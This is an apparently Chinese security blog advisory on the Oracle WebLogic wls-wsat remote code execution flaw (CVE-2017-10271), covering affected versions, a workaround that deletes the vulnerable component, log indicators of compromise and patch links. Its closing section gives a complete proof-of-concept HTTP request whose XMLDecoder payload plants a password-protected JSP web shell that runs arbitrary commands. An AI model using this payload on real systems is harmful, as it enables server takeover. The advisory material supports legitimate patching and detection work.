微慑信息网

Oracle WebLogic wls-wsat RCE CVE-2017-10271

黑客利用WebLogic 反序列化漏洞(CVE-2017-3248)和WebLogic WLS 组件漏洞(CVE-2017-10271)对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞,属于没有公开细节的野外利用漏洞,大量企业尚未及时安装补丁。官方在 2017 年 10 月份发布了该漏洞的补丁。

该漏洞的利用方法较为简单,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限,危害巨大。由于漏洞较新,目前仍然存在很多主机尚未更新相关补丁。预计在此次突发事件之后,很可能出现攻击事件数量激增,大量新主机被攻陷的情况。

攻击者能够同时攻击Windows及Linux主机,并在目标中长期潜伏。由于Oracle WebLogic的使用面较为广泛,攻击面涉及各个行业。此次攻击中使用的木马为典型的比特币挖矿木马。但该漏洞可被黑客用于其它目的攻击。

Oracle官方描述

image.png

image.png

漏洞编号

CVE-2017-10271

影响版本

Oracle Weblogic Server 10.3.6.0

Oracle Weblogic Server 12.2.1.2

Oracle Weblogic Server 12.2.1.1

Oracle Weblogic Server 12.1.3.0

临时解决方案

根据实际环境路径,删除WebLogic程序下列war包及目录。

rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

重启WebLogic或系统后,确认以下链接访问是否为404

http://x.x.x.x:7001/wls-wsat

漏洞自查

对于 Linux 主机,检查日志中是否出现以下字符串:

java.io.IOException: Cannot run program"cmd.exe": java.io.IOException: error=2, No such file or directory

对于 Windows 主机,检查日志中是否出现以下字符串:

java.io.IOException: Cannot run program “/bin/bash":java.io.IOException: error=2, No such file or directory

若出现,则说明系统已被入侵。

漏洞补丁

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

参考

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

http://suo.im/I3NjS

http://suo.im/19DoNp

拓展阅读(点评/知识):

WebLogic wls-wsat POCST

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: 10.100.13.203:10081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv:11.0) like Gecko
Accept: */*
Content-Type: text/xml
Accept-Language: zh-cn
Content-Length: 908
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/aabb.jsp</string><void method="println"><string><![CDATA[<%   if("023".equals(request.getParameter("pwd"))){  
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();  
        int a = -1;  
        byte[] b = new byte[2048];  
        out.print("<pre>");  
        while((a=in.read(b))!=-1){  
            out.println(new String(b));  
        }  
        out.print("</pre>");  
    } %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

 

 

本文标题:Oracle WebLogic wls-wsat RCE CVE-2017-10271
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2017/1222_5094.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » Oracle WebLogic wls-wsat RCE CVE-2017-10271
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们